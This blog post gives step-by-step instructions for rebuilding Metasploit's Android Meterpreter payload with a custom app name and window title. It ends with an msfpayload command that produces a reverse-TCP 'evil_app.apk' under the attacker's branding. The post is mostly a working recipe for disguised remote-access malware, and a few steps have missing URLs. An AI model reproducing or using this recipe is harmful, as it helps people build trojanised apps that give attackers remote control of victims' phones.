Customizing Metasploit Java Payloads for Android APK Deployment

Customizing a metasploit Java payload can be accomplished through the following process. Please note that some steps may require other modification or skills to complete. This is not a simple how-to, but more of a reference for those who already know metasploit, and just need to customize some element of the packaging for a Meterpreter payload, or a Android apk app, etc.


  1. Install Maven, the Oracle JDK 8, and dependancies.  In Ubuntu, this is done with:
    apt-add-repository ppa:webupd8team/java
    apt-get update
    apt-get install oracle-java8-installer maven
  2. Clone the java sources in the same directory that you have the metasploit-framework directory/
    git clone
  3. Download the Android SDK (or Android Studio if you like) from: 
    Install it using: the /root/android-studio/bin/ command.  Many downloads and installation processes will follow.
  4. Add a mapping for the shell variable ANDROID_HOME in your .profile and re-source it:
    echo “ANDROID_HOME=/root/Android/Sdk” >> ~/.profile
    source ~/.profile
  5. Force update the Android SDK tools with (We need to get the older versions of the tools)  NOTE THAT THIS WILL BE A LARGE DOWNLOAD OF SDK FILES:
    /root/android/Sdk/tools/android update sdk –no-ui —obsolete –force
  6. Edit the files that you need to edit.  For example, to change the Application name and Window Title on the meterpreter Android app:
    gedit metasploit-javapayload/androidpayload/app/res/values/strings.xml (to change the app_name parameter)
    gedit metasploit-javapayload/androidpayload/app/AndroidManifest.xml (to change the app_name in the manifest)
  7. Use Maven to build the Java targets.  This is usually done in the metasploit-javapayload directory with:
  8. mvn package
  9. Deploy the compiled Java to the main metasploit-framework directory with:
    mvn -P deploy package Turns out this is how one deploys the meterpreter and traditional payloads.  The actual thing to do for the Android APK is (Many Thanks to Paul for testing this and letting me know):
    mvn -P android package

Then do the usual thing to create the payload apk:

msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=443 R > evil_app.apk

And viola, you’ve got evil app with your branding, or modifications. Please ask any questions, and I’ll tell you what I know :-).


Phorkus is just this guy...

Leave a Reply

Your email address will not be published. Required fields are marked *